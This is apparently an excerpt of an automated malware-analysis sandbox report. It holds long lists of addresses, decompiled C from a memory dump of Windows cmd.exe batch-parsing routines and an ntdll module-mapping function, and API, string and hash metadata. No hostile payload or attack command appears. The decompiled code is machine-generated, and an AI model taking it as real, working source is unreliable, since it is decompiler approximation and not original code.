0x0034f59d
0x0034f59f
0x0034f5a1
0x0034f5a1
0x0034f5af
0x0034f5b2
0x0034f5b5
0x0034f5b7
0x0034f5b9
0x0034f5b9
0x0034f5c1
0x0034f5c2
0x0034f5c6
0x0034f5c9
0x0034f5cb
0x0034f5cd
0x0034f5cd
0x0034f5d5
0x00346175
0x00346175
0x00346178
0x0034617a
0x0034618a
0x00000000
0x00000000
0x00346190
0x0034619e
0x003461a2
0x003461aa
0x003461ae
0x0034f685
0x003461b4
0x003461b4
0x003461b4
0x003461bb
0x003461c6
0x003461ca
0x003461ca
0x003461de
0x003461de
0x003461e3
0x003461e8
0x0034f690
0x0034f690
0x003461ee
0x003461f6
0x003461fa
0x00346201
0x00000000
0x00346207
0x00346208
0x0034620a
0x0034620f
0x00346215
0x0034621d
0x0034621f
0x00346221
0x00346224
0x00346229
0x0034623a
0x0034623c
0x00346240
0x0034f69b
0x0034f69f
0x0034f69f
0x0034f6a0
0x0034f6a3
0x0034f6a3
0x0034f6a6
0x0034f6a9
0x0034f6a9
0x0034f6b8
0x0034f6b8
0x00346247
0x00346250
0x0034628d
0x0034628f
0x00346294
0x00346296
0x00346296
0x0034626a
0x0034626c
0x003462a2
0x003462a5
0x003462aa
0x003462ac
0x003462ae
0x003462b0
0x003462b0
0x003462b3
0x003462b3
0x003462b6
0x003462b9
0x003462b9
0x003462be
0x003462c0
0x003462c0
0x003462c2
0x003462c4
0x003462c7
0x003462c7
0x003462ca
0x003462cd
0x003462cd
0x003462d8
0x003462df
0x003462e4
0x00000000
0x00000000
0x003462ea
0x003462f0
0x003462f0
0x00346271
0x0034627d
0x0034628a
0x0034628a
0x00346252
0x00346258
0x0034625f
0x00000000
0x0034f6c2
0x0034f6c2
0x0034f6c5
0x00000000
0x00000000
0x0034f57d
0x00000000
0x0034f57d
0x0034625f
0x0034622d
0x0034622d
0x0034622f
0x00346232
0x00346237
0x00000000
0x00346237
0x00346201
0x00346103
0x0034610d
0x00000000
0x00000000
0x00346113
0x00346116
0x00346116
0x00346119
0x0034611c
0x0034612b
0x00000000
0x00000000
0x00346131
0x00346135
0x00346135
0x00346138
0x00346138
0x0034613b
0x0034613e
0x00346147
0x00346149
0x0034614f
0x00346154
0x00346159
0x0034615f
0x00346163
0x0034f5e0
0x0034f5e1
0x0034f5e4
0x0034f5ef
0x0034f5ef
0x0034f5f2
0x0034f5f4
0x0034f5f6
0x0034f5f6
0x0034f604
0x0034f607
0x0034f60a
0x0034f60c
0x0034f60e
0x0034f60e
0x0034f614
0x0034f618
0x0034f61b
0x0034f61d
0x0034f61f
0x0034f61f
0x0034f627
0x0034f62b
0x0034f62e
0x0034f630
0x0034f632
0x0034f632
0x0034f638
0x0034f63b
0x0034f63d
0x0034f63d
0x0034f640
0x0034f643
0x0034f643
0x0034f648
0x0034f648
0x0034f64a
0x0034f64c
0x0034f64e
0x0034f64e
0x0034f651
0x0034f651
0x0034f654
0x0034f657
0x0034f657
0x0034f665
0x0034f669
0x0034f66e
0x00000000
0x00000000
0x0034f67b
0x00000000
0x0034f67b
0x0034f5e6
0x0034f5e9
0x00000000
0x00000000
0x00000000
0x0034f5e9
0x00346169
0x00346170
0x00000000
0x00000000
0x00000000
0x00000000
0x0034603d
0x0034603d
0x0034603d
0x00346040
0x00346043
0x00000000

APIs

Part of subcall function 00343320: _wcsnicmp.MSVCRT ref: 003433A4

Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EAB7
Part of subcall function 0033EA40: iswspace.MSVCRT ref: 0033EB2D
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB49
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB6D

Part of subcall function 003462FA: _wcsnicmp.MSVCRT ref: 00346367
Part of subcall function 003462FA: _wcsnicmp.MSVCRT ref: 0034F6F6

memset.MSVCRT ref: 003460C8
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00007EE3,00000001), ref: 0034620F
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00346247
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00346252
??_V@YAXPAX@Z.MSVCRT ref: 00346271

Strings

COPYCMD, xrefs: 00345FFF

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
String ID: COPYCMD
API String ID: 1068965577-3727491224
Opcode ID: c423e0778148677676b79f4a96be17ae23dd2f535818b05ed95745daa6f5b192
Instruction ID: b9efad978f148d5fc9d1b242e27e5b0cb3c33676d5f6746fcb80c5264bdd8684
Opcode Fuzzy Hash: c423e0778148677676b79f4a96be17ae23dd2f535818b05ed95745daa6f5b192
Instruction Fuzzy Hash: 26D11835A001169FCB26DF68CC956BAB3F5EF59300F0A45A9D806DF291EA34FE81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00335E70, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 292
COMMONCrypto

Download Yara Rule

C-Code - Quality: 44%

			E00335E70(void* __ecx, signed int* _a4) {
				signed int _v8;
				short _v24;
				short _v26;
				short _v28;
				signed short _v29;
				signed int _v36;
				signed int _v40;
				signed short* _v44;
				intOrPtr _v48;
				int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				signed int _t100;
				intOrPtr _t104;
				signed int _t107;
				short* _t117;
				signed int _t118;
				signed short* _t120;
				signed short _t122;
				signed int _t124;
				signed int _t129;
				signed int _t132;
				signed short _t133;
				signed int _t135;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				short _t148;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t162;
				void* _t163;
				signed short _t165;
				signed short _t170;
				void* _t173;
				signed int _t174;
				signed int _t177;
				intOrPtr _t178;
				void* _t189;
				signed short* _t200;
				signed int _t204;
				void* _t205;
				void* _t206;
				signed int* _t212;
				void* _t213;
				void* _t214;
				signed int _t216;
				wchar_t* _t219;
				int _t220;
				void* _t221;
				signed int _t223;
				signed int* _t225;
				signed int _t230;
				signed int _t234;

				_t230 = _t234;
				_push(__ecx);
				_push(__ecx);
				_t212 = _a4;
				_t162 = 0;
				_t219 = _t212[0xf];
				if(_t219 == 0) {
					L15:
					if( *_t212 != 0x14) {
						goto L65;
					} else {
						goto L16;
					}
				} else {
					_t205 = 0x20;
					while(1) {
						_t80 =  *_t219 & 0x0000ffff;
						if(_t80 == 0 || _t80 > _t205) {
							break;
						}
						_t219 =  &(_t219[0]);
						__eflags = _t219;
						if(_t219 != 0) {
							continue;
						} else {
						}
						break;
					}
					if(_t219 == 0) {
						goto L15;
					} else {
						__imp___wcsnicmp(_t219, L"/B", 2);
						_t234 = _t234 + 0xc;
						if(_t80 != 0) {
							L11:
							if(_t219 != 0) {
								_t80 = swscanf(_t219, L"%d",  &_v8);
								_t234 = _t234 + 0xc;
								if(_t80 == 1) {
									_t80 = _v8;
									 *0x36b8b0 = _t80;
									if( *0x373ccc != _t162) {
										_t162 = _t80;
									}
								}
							}
							goto L15;
						} else {
							 *_t212 = 0x14;
							_t212[0xf] = L":EOF";
							_t219 =  &(_t219[1]);
							if(_t219 == 0) {
								L16:
								if( *0x373cc4 == 0) {
									L65:
									_t170 =  *0x363874;
									E0033C7F7(_t80, _t170);
									_t220 =  *0x36b8b0;
									do {
										__eflags = E00344B60(__eflags, 0);
									} while (__eflags == 0);
									exit(_t220);
									asm("int3");
									_t83 =  *(_t162 + 0xc);
									__eflags = _t83;
									if(_t83 != 0) {
										do {
											_t216 = _t83;
											_v40 = _t216;
											_t83 =  *(_t216 + 0xc);
											__eflags = _t83;
										} while (_t83 != 0);
										_t212 = _v36;
										_t162 = _v40;
									}
									_t84 =  *_t220 & 0x0000ffff;
									__eflags = _t84;
									if(_t84 == 0) {
										L38:
										_t85 = 0;
										__eflags = 0;
										goto L39;
									} else {
										while(1) {
											_t207 = 0x2f;
											_v29 = _t170;
											__eflags = _t84 - _t207;
											if(_t84 != _t207) {
												goto L36;
											}
											_t7 = _t220 + 4; // 0x4
											_t117 = _t7;
											_t165 = _t170;
											__eflags =  *_t117 - 0x2d;
											_v52 = _t117;
											if( *_t117 == 0x2d) {
												_v29 = 1;
												_t165 = 1;
											}
											_t118 = _t165 & 0x0000ffff;
											_v36 = _t118;
											_t120 = _t220 + (_t118 + 2) * 2;
											_v44 = _t120;
											_t122 = towupper( *_t120 & 0x0000ffff);
											_pop(_t196);
											_t124 = (_t122 & 0x0000ffff) - 0x3f;
											__eflags = _t124;
											if(__eflags == 0) {
												E00359373(_t207, __eflags);
												__eflags = 0;
												_push(0);
												_push(0x2381);
												E0033C108(_t196);
												 *0x378065 = 0;
												 *0x37851c = 0;
												goto L93;
											} else {
												_t129 = _t124;
												__eflags = _t129;
												if(_t129 == 0) {
													__eflags = _v29;
													if(_v29 == 0) {
														_t207 = _t212;
														_t132 = E00359CFA(_t220 + (_v36 + 3) * 2, _t212);
														__eflags = _t132;
														if(_t132 != 0) {
															goto L93;
														} else {
															__eflags = _t212[2] & 0x00000001;
															if((_t212[2] & 0x00000001) != 0) {
																 *_t212 =  *_t212 | 0x00001000;
															}
															goto L33;
														}
													} else {
														_t200 = _v44;
														_t207 =  &(_t200[1]);
														do {
															_t133 =  *_t200;
															_t200 =  &(_t200[1]);
															__eflags = _t133 - _v48;
														} while (_t133 != _v48);
														_t196 = _t200 - _t207 >> 1;
														__eflags = _t200 - _t207 >> 1 - 1;
														if(_t200 - _t207 >> 1 > 1) {
															goto L89;
														} else {
															_t212[1] = 6;
															_t212[2] = 0;
															goto L33;
														}
													}
												} else {
													_t139 = _t129 - 5;
													__eflags = _t139;
													if(_t139 == 0) {
														__eflags = _v29;
														_t140 =  *_t212;
														if(_v29 != 0) {
															_t141 = _t140 ^ 0x00001000;
														} else {
															_t141 = _t140 | 0x00001000;
															__eflags = _t141;
														}
														goto L32;
													} else {
														_t143 = _t139 - 0xa;
														__eflags = _t143;
														if(_t143 == 0) {
															__eflags = _v29;
															_t144 =  *_t212;
															if(_v29 == 0) {
																_t141 = _t144 | 0x00000800;
															} else {
																_t141 = _t144 ^ 0x00000800;
															}
															goto L32;
														} else {
															_t145 = _t143 - 1;
															__eflags = _t145;
															if(_t145 != 0) {
																__eflags = _t145 != 0;
																if(_t145 != 0) {
																	_t148 = 0x2f;
																	_v28 = _t148;
																	_v26 =  *((intOrPtr*)(_t220 + 4));
																	_v24 = 0;
																	_push(_t220 + ((_t165 & 0x0000ffff) + 2) * 2);
																	_push(1);
																	_push(0x2375);
																	goto L91;
																} else {
																	__eflags = _v29;
																	_t154 =  *_t212;
																	if(_v29 != 0) {
																		_t155 = _t154 ^ 0x00000010;
																	} else {
																		_t155 = _t154 | 0x00000010;
																		__eflags = _t155;
																	}
																	 *_t212 = _t155;
																	_t156 = _v36;
																	__eflags =  *(_t220 + 6 + _t156 * 2);
																	if( *(_t220 + 6 + _t156 * 2) == 0) {
																		goto L33;
																	} else {
																		_t204 = (_t165 & 0x0000ffff) + 2;
																		_t196 = _t220 + _t204 * 2;
																		_push(_t220 + _t204 * 2);
																		goto L90;
																	}
																}
															} else {
																__eflags = _v29;
																_t157 =  *_t212;
																if(_v29 != 0) {
																	_t141 = _t157 ^ 0x00002000;
																} else {
																	_t141 = _t157 | 0x00002000;
																}
																L32:
																 *_t212 = _t141;
																_t196 = 0;
																_t142 = _v36;
																__eflags =  *(_t220 + 6 + _t142 * 2);
																if( *(_t220 + 6 + _t142 * 2) != 0) {
																	L89:
																	_t135 = (_t165 & 0x0000ffff) + 2;
																	__eflags = _t135;
																	_push(_t220 + _t135 * 2);
																	L90:
																	_push(1);
																	_push(0x2376);
																	L91:
																	E0033C5A2(_t196);
																	L93:
																	_t85 = 1;
																	L39:
																	_pop(_t213);
																	_pop(_t221);
																	__eflags = _v8 ^ _t230;
																	_pop(_t163);
																	return E00346FD0(_t85, _t163, _v8 ^ _t230, _t207, _t213, _t221);
																} else {
																	L33:
																	_t220 = _v52;
																	_t162 = _v40;
																	L34:
																	_t220 = E0033D7E6(_t220);
																	_t84 =  *_t220 & 0x0000ffff;
																	__eflags = _t84;
																	if(_t84 == 0) {
																		goto L38;
																	} else {
																		_t170 = 0;
																		continue;
																	}
																}
															}
														}
													}
												}
											}
											goto L102;
											L36:
											_t87 = _t212[0x12];
											__eflags = _t87;
											if(_t87 != 0) {
												_t173 = 0x10;
												_t88 = E003400B0(_t173);
												__eflags = _t88;
												if(_t88 == 0) {
													E00359287(_t173);
													__imp__longjmp(0x36b8b8, 1);
													asm("int3");
													_t174 = 0x373ab0;
													__eflags = 0;
													do {
														_t90 =  *_t174;
														_t174 = _t174 + 2;
														__eflags = _t90;
													} while (_t90 != 0);
													_t214 = (_t174 - 0x373ab2 >> 1) + 1;
													_t223 = HeapAlloc(GetProcessHeap(), 8, 0xc);
													__eflags = _t223;
													if(_t223 == 0) {
														L96:
														_t94 = 1;
													} else {
														_t177 = HeapAlloc(GetProcessHeap(), 8, _t214 + _t214);
														 *_t223 = _t177;
														__eflags = _t177;
														if(_t177 == 0) {
															goto L96;
														} else {
															_t98 =  *0x373cb8;
															__eflags = _t98;
															if(_t98 == 0) {
																_t98 = 0x373ab0;
															}
															E00341040(_t177, _t214, _t98);
															_t100 = E00343B2C(_t177);
															 *(_t223 + 4) = _t100;
															__eflags = _t100;
															if(_t100 == 0) {
																goto L96;
															} else {
																_t178 =  *0x373cc4;
																 *((char*)(_t223 + 8)) =  *0x373cc9;
																 *((char*)(_t223 + 9)) =  *0x373cc8;
																 *(_t178 + 0x90 +  *(_t178 + 0x14) * 4) = _t223;
																_t104 =  *0x373cd8;
																 *(_t178 + 0x14) =  *(_t178 + 0x14) + 1;
																 *((intOrPtr*)(_t178 + 0xc)) = _t104;
																__eflags =  *((intOrPtr*)(_t178 + 0x10)) - _t104;
																if( *((intOrPtr*)(_t178 + 0x10)) < _t104) {
																	 *((intOrPtr*)(_t178 + 0x10)) = _t104;
																}
																_t225 = E0033EA40( *((intOrPtr*)( *((intOrPtr*)(_t162 + 8)) + 0x3c)), 0, 0);
																_t107 = 0;
																 *0x36b8b0 = 0;
																while(1) {
																	__eflags =  *_t225 - _t107;
																	if( *_t225 == _t107) {
																		break;
																	}
																	__imp___wcsicmp(_t225, L"ENABLEEXTENSIONS");
																	__eflags = _t107;
																	if(_t107 != 0) {
																		__imp___wcsicmp(_t225, L"DISABLEEXTENSIONS");
																		__eflags = _t107;
																		if(_t107 == 0) {
																			 *0x373cc9 = 0;
																			goto L58;
																		} else {
																			__imp___wcsicmp(_t225, L"ENABLEDELAYEDEXPANSION");
																			__eflags = _t107;
																			if(_t107 != 0) {
																				__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
																				_t189 = _t225;
																				__eflags = _t107;
																				if(_t107 != 0) {
																					__eflags =  *_t225;
																					if( *_t225 == 0) {
																						goto L58;
																					} else {
																						_push(0);
																						_push(0x400023a6);
																						E0033C5A2(_t189);
																						_t94 = 1;
																						 *0x36b8b0 = 1;
																					}
																				} else {
																					 *0x373cc8 = _t107;
																					goto L58;
																				}
																			} else {
																				 *0x373cc8 = 1;
																				goto L58;
																			}
																		}
																	} else {
																		 *0x373cc9 = 1;
																		L58:
																		_t225 = E0033D7E6(_t225);
																		_t107 = 0;
																		__eflags = 0;
																		continue;
																	}
																	goto L63;
																}
																_t94 = 0;
																__eflags = 0;
															}
														}
													}
													L63:
													return _t94;
												} else {
													 *(_t162 + 0xc) = _t88;
													_t162 = _t88;
													 *((intOrPtr*)(_t88 + 0xc)) = 0;
													_t87 = _t212[0x12];
													_v40 = _t162;
													goto L37;
												}
											} else {
												L37:
												_t212[0x12] = _t87 + 1;
												 *_t162 = E0034297B(E003422C0(_t162, _t220));
												 *((char*)(_t162 + 8)) = 1;
												goto L34;
											}
											goto L102;
										}
									}
								} else {
									E00336980(_t212);
									return _t162;
								}
							} else {
								_t206 = 0x20;
								while(1) {
									_t80 =  *_t219 & 0x0000ffff;
									if(_t80 == 0 || _t80 > _t206) {
										goto L11;
									}
									_t219 =  &(_t219[0]);
									if(_t219 != 0) {
										continue;
									}
									goto L11;
								}
								goto L11;
							}
						}
					}
				}
				L102:
			}

0x00335e73
0x00335e75
0x00335e76
0x00335e7a
0x00335e7d
0x00335e7f
0x00335e84
0x00335f0d
0x00335f10
0x00000000
0x00000000
0x00000000
0x00000000
0x00335e8a
0x00335e8c
0x00335e8d
0x00335e8d
0x00335e93
0x00000000
0x00000000
0x00335f35
0x00335f35
0x00335f38
0x00000000
0x00000000
0x00335f3e
0x00000000
0x00335f38
0x00335ea0
0x00000000
0x00335ea2
0x00335eaa
0x00335eb0
0x00335eb5
0x00335edf
0x00335ee1
0x00335eed
0x00335ef3
0x00335ef9
0x00335efb
0x00335efe
0x00335f09
0x00335f0b
0x00335f0b
0x00335f09
0x00335ef9
0x00000000
0x00335eb7
0x00335eb7
0x00335ebd
0x00335ec4
0x00335ec7
0x00335f16
0x00335f1d
0x0034a76e
0x0034a76e
0x0034a774
0x0034a779
0x0034a77f
0x0034a786
0x0034a786
0x0034a78b
0x0034a791
0x0034a792
0x0034a795
0x0034a797
0x0034a79d
0x0034a79d
0x0034a79f
0x0034a7a2
0x0034a7a5
0x0034a7a5
0x0034a7a9
0x0034a7ac
0x0034a7ac
0x0033c2db
0x0033c2de
0x0033c2e1
0x0033c3c8
0x0033c3c8
0x0033c3c8
0x00000000
0x00000000
0x0033c2e7
0x0033c2e9
0x0033c2ea
0x0033c2ed
0x0033c2f0
0x00000000
0x00000000
0x0033c2f6
0x0033c2f6
0x0033c2f9
0x0033c2fb
0x0033c2ff
0x0033c302
0x0034a7b6
0x0034a7ba
0x0034a7ba
0x0033c308
0x0033c30b
0x0033c311
0x0033c314
0x0033c31b
0x0033c324
0x0033c325
0x0033c325
0x0033c328
0x0034a8c7
0x0034a8cc
0x0034a8ce
0x0034a8cf
0x0034a8d4
0x0034a8db
0x0034a8e1
0x00000000
0x0033c32e
0x0033c32f
0x0033c32f
0x0033c332
0x0034a7f0
0x0034a7f4
0x0034a829
0x0034a831
0x0034a836
0x0034a838
0x00000000
0x0034a83e
0x0034a83e
0x0034a842
0x0034a848
0x0034a848
0x00000000
0x0034a842
0x0034a7f6
0x0034a7f6
0x0034a7f9
0x0034a7fc
0x0034a7fc
0x0034a7ff
0x0034a802
0x0034a802
0x0034a80a
0x0034a80c
0x0034a80f
0x00000000
0x0034a815
0x0034a817
0x0034a81e
0x00000000
0x0034a81e
0x0034a80f
0x0033c338
0x0033c338
0x0033c338
0x0033c33b
0x0033c362
0x0033c366
0x0033c368
0x0034a7e6
0x0033c36e
0x0033c36e
0x0033c36e
0x0033c36e
0x00000000
0x0033c33d
0x0033c33d
0x0033c33d
0x0033c340
0x0034a7ca
0x0034a7ce
0x0034a7d0
0x0034a7dc
0x0034a7d2
0x0034a7d2
0x0034a7d2
0x00000000
0x0033c346
0x0033c346
0x0033c346
0x0033c349
0x0033c3dc
0x0033c3df
0x0034a886
0x0034a887
0x0034a88f
0x0034a895
0x0034a8a2
0x0034a8a3
0x0034a8a5
0x00000000
0x0033c3e5
0x0033c3e5
0x0033c3e9
0x0033c3eb
0x0033c403
0x0033c3ed
0x0033c3ed
0x0033c3ed
0x0033c3ed
0x0033c3f0
0x0033c3f4
0x0033c3f7
0x0033c3fc
0x00000000
0x0033c3fe
0x0034a87b
0x0034a87e
0x0034a881
0x00000000
0x0034a881
0x0033c3fc
0x0033c34f
0x0033c34f
0x0033c353
0x0033c355
0x0034a7c0
0x0033c35b
0x0033c35b
0x0033c35b
0x0033c373
0x0033c373
0x0033c375
0x0033c377
0x0033c37a
0x0033c37f
0x0034a8ac
0x0034a8af
0x0034a8af
0x0034a8b5
0x0034a8b6
0x0034a8b6
0x0034a8b8
0x0034a8bd
0x0034a8bd
0x0034a8e7
0x0034a8e9
0x0033c3ca
0x0033c3cd
0x0033c3ce
0x0033c3cf
0x0033c3d1
0x0033c3da
0x0033c385
0x0033c385
0x0033c385
0x0033c388
0x0033c38b
0x0033c392
0x0033c394
0x0033c397
0x0033c39a
0x00000000
0x0033c39c
0x0033c39c
0x00000000
0x0033c39c
0x0033c39a
0x0033c37f
0x0033c349
0x0033c340
0x0033c33b
0x0033c332
0x00000000
0x0033c3a3
0x0033c3a3
0x0033c3a6
0x0033c3a8
0x0034a855
0x0034a856
0x0034a85b
0x0034a85d
0x0034a8ef
0x0034a8fb
0x0034a901
0x0034a902
0x0033c471
0x0033c473
0x0033c473
0x0033c476
0x0033c479
0x0033c479
0x0033c486
0x0033c496
0x0033c498
0x0033c49a
0x0034a91a
0x0034a91c
0x0033c4a0
0x0033c4b3
0x0033c4b5
0x0033c4b7
0x0033c4b9
0x00000000
0x0033c4bf
0x0033c4bf
0x0033c4c4
0x0033c4c6
0x0034a922
0x0034a922
0x0033c4cf
0x0033c4d4
0x0033c4d9
0x0033c4dc
0x0033c4de
0x00000000
0x0033c4e4
0x0033c4e4
0x0033c4ef
0x0033c4f7
0x0033c4fd
0x0033c504
0x0033c509
0x0033c50c
0x0033c50f
0x0033c512
0x0033c514
0x0033c514
0x0033c527
0x0033c529
0x0033c52b
0x0033c56c
0x0033c56c
0x0033c56f
0x00000000
0x00000000
0x0033c577
0x0033c57f
0x0033c581
0x0033c538
0x0033c540
0x0033c542
0x0033c59b
0x00000000
0x0033c544
0x0033c54a
0x0033c552
0x0033c554
0x0034a932
0x0034a939
0x0034a93a
0x0034a93c
0x0034a94a
0x0034a94d
0x00000000
0x0034a953
0x0034a953
0x0034a954
0x0034a959
0x0034a961
0x0034a963
0x0034a963
0x0034a93e
0x0034a93e
0x00000000
0x0034a93e
0x0033c55a
0x0033c55a
0x00000000
0x0033c55a
0x0033c554
0x0033c583
0x0033c583
0x0033c561
0x0033c568
0x0033c56a
0x0033c56a
0x00000000
0x0033c56a
0x00000000
0x0033c581
0x0033c58c
0x0033c58c
0x0033c58c
0x0033c4de
0x0033c4b9
0x0033c58e
0x0033c596
0x0034a863
0x0034a863
0x0034a868
0x0034a86a
0x0034a86d
0x0034a870
0x00000000
0x0034a870
0x0033c3ae
0x0033c3ae
0x0033c3b1
0x0033c3c0
0x0033c3c2
0x00000000
0x0033c3c2
0x00000000
0x0033c3a8
0x0033c2e7
0x00335f23
0x00335f24
0x00335f31
0x00335f31
0x00335ec9
0x00335ecb
0x00335ecc
0x00335ecc
0x00335ed2
0x00000000
0x00000000
0x00335eda
0x00335edd
0x00000000
0x00000000
0x00000000
0x00335edd
0x00000000
0x00335ecc
0x00335ec7
0x00335eb5
0x00335ea0
0x00000000

APIs

_wcsnicmp.MSVCRT ref: 00335EAA
swscanf.MSVCRT ref: 00335EED

Strings

:EOF, xrefs: 00335EBD

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsnicmpswscanf
String ID: :EOF
API String ID: 1534968528-551370653
Opcode ID: 9541803bfe43eafb816a51d2ea92fc7067a1b0f33b9ab6085bcb842aa5a370ef
Instruction ID: b94a27301ec831ed0571ff42b9e14a53f051ef45e61e89f46ceff919688c19a9
Opcode Fuzzy Hash: 9541803bfe43eafb816a51d2ea92fc7067a1b0f33b9ab6085bcb842aa5a370ef
Instruction Fuzzy Hash: 51A12635A546159BDB33DF68C8847BAB7F8FF04310F15841AE882EB680E778AD41C792

Uniqueness

Uniqueness Score: -1.00%

Function 033A80FC, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E033A80FC(void* __ecx) {
				char _v5;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void** _v24;
				char _t41;
				void* _t53;
				void* _t58;
				intOrPtr _t61;
				long _t65;
				intOrPtr _t68;
				PVOID* _t69;
				void* _t74;
				signed int _t76;
				void* _t78;
				void** _t79;
				intOrPtr _t80;
				long _t81;
				void* _t82;

				_t66 = __ecx;
				_t78 = __ecx;
				_t80 =  *((intOrPtr*)(__ecx + 0x20));
				if(( *0x3485780 & 0x00000009) != 0) {
					E03415510("minkernel\\ntdll\\ldrmap.c", 0x27b, "LdrpMinimalMapModule", 3, "DLL name: %wZ\n", _t80 + 0x24);
					_t82 = _t82 + 0x18;
				}
				_t41 = E033B9DA0(_t66, _t80 + 0x2c, 0x337119c, 1);
				_v5 = _t41;
				_v16 = 0;
				_t65 = 0x800000;
				if(_t41 == 0) {
					_t61 =  *0x34879d8; // 0x0
					if(_t61 != 0) {
						_v12 = 0;
						E0339C600(_t61,  *((intOrPtr*)(_t80 + 0x30)), 4,  &_v12, 4, 0);
						if(_v12 != 0 && E0342B8D0(_t74, 0x337e420, 1, 0,  &_v16) >= 0) {
							_t65 = 0x20000000;
						}
					}
				}
				_t68 =  *[fs:0x18];
				 *(_t78 + 0x5c) =  *(_t78 + 0x5c) & 0x00000000;
				_v12 = _t68;
				_v20 =  *((intOrPtr*)(_t68 + 0x14));
				 *((intOrPtr*)(_t68 + 0x14)) =  *((intOrPtr*)(_t80 + 0x28));
				_t76 =  *(_t78 + 0x10) & 0x00800000;
				if(_t76 != 0) {
					_t65 = _t65 | 0x00040000;
				}
				_t69 = _t80 + 0x18;
				_v24 = _t69;
				_t81 = NtMapViewOfSection( *(_t78 + 0xc), 0xffffffff, _t69, 0, 0, 0, _t78 + 0x5c, 1, _t65, 2 + (0 | _t76 == 0x00000000) * 2);
				 *((intOrPtr*)(_v12 + 0x14)) = _v20;
				if(_t65 == 0x20000000) {
					E0342C450(_v16);
				}
				_t53 = _t81 - 0x40000003;
				if(_t53 == 0) {
					L13:
					if( *((intOrPtr*)(_t78 + 0x60)) == 0) {
						if(E033C0548(_t78, 1) == 0) {
							if(_v5 != 0) {
								_t81 = 0xc0000018;
							}
						} else {
							_t81 = 0xc000022d;
						}
					}
				} else {
					_t58 = _t53 - 0xb;
					if(_t58 == 0) {
						_t81 = E0341A6DE(_t78);
						L8:
						_t79 = _v24;
						if( *_t79 != 0 && (_t81 < 0 || _t81 == 0x4000000e)) {
							NtUnmapViewOfSection(0xffffffff,  *_t79);
							 *_t79 =  *_t79 & 0x00000000;
						}
						if(( *0x3485780 & 0x00000009) != 0) {
							E03415510("minkernel\\ntdll\\ldrmap.c", 0x302, "LdrpMinimalMapModule", 4, "Status: 0x%08lx\n", _t81);
						}
						return _t81;
					}
					if(_t58 == 0x28) {
						goto L13;
					}
				}
			}

0x033a80fc
0x033a810e
0x033a8110
0x033a8113
0x033f99f6
0x033f99fb
0x033f99fb
0x033a8124
0x033a812b
0x033a812e
0x033a8131
0x033a8138
0x033a813a
0x033a8141
0x033f9a06
0x033f9a13
0x033f9a1c
0x033f9a3c
0x033f9a3c
0x033f9a1c
0x033a8141
0x033a8147
0x033a814e
0x033a8152
0x033a8158
0x033a815e
0x033a8164
0x033a816a
0x033f9a46
0x033f9a46
0x033a8172
0x033a8177
0x033a819f
0x033a81a4
0x033a81ad
0x033f9a54
0x033f9a54
0x033a81b5
0x033a81ba
0x033a81f4
0x033a81f8
0x033a8205
0x033a8220
0x033a8222
0x033a8222
0x033a8207
0x033a8207
0x033a8207
0x033a8205
0x033a81bc
0x033a81bc
0x033a81bf
0x033f9a65
0x033a81ca
0x033a81ca
0x033a81d0
0x033a8212
0x033a8217
0x033a8217
0x033a81e5
0x033f9a83
0x033f9a88
0x033a81f3
0x033a81f3
0x033a81c8
0x00000000
0x00000000
0x033a81c8

APIs

NtMapViewOfSection.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00800000,00000000,?,0337119C,00000001,?,00000000), ref: 033A8197
NtUnmapViewOfSection.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(000000FF,?,?,0337119C,00000001,?,00000000,?,?,033A7F7A,?,00000000,?,00000060,000014A5), ref: 033A8212

Strings

LdrpMinimalMapModule, xrefs: 033F99E7, 033F9A74
minkernel\ntdll\ldrmap.c, xrefs: 033F99F1, 033F9A7E
DLL name: %wZ, xrefs: 033F99E0
Status: 0x%08lx, xrefs: 033F9A6D

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Section.0000001View$Unmap
String ID: DLL name: %wZ$LdrpMinimalMapModule$Status: 0x%08lx$minkernel\ntdll\ldrmap.c
API String ID: 4037447191-1759440706
Opcode ID: 653a9a9a295464a0dcd07f0c2ef591b057480489e1638de52f97446764051d07
Instruction ID: 0b01979ca8c2619926ad4a1955a110a3d7528ad3996a3a6cd7a64b54fefa26c4
Opcode Fuzzy Hash: 653a9a9a295464a0dcd07f0c2ef591b057480489e1638de52f97446764051d07
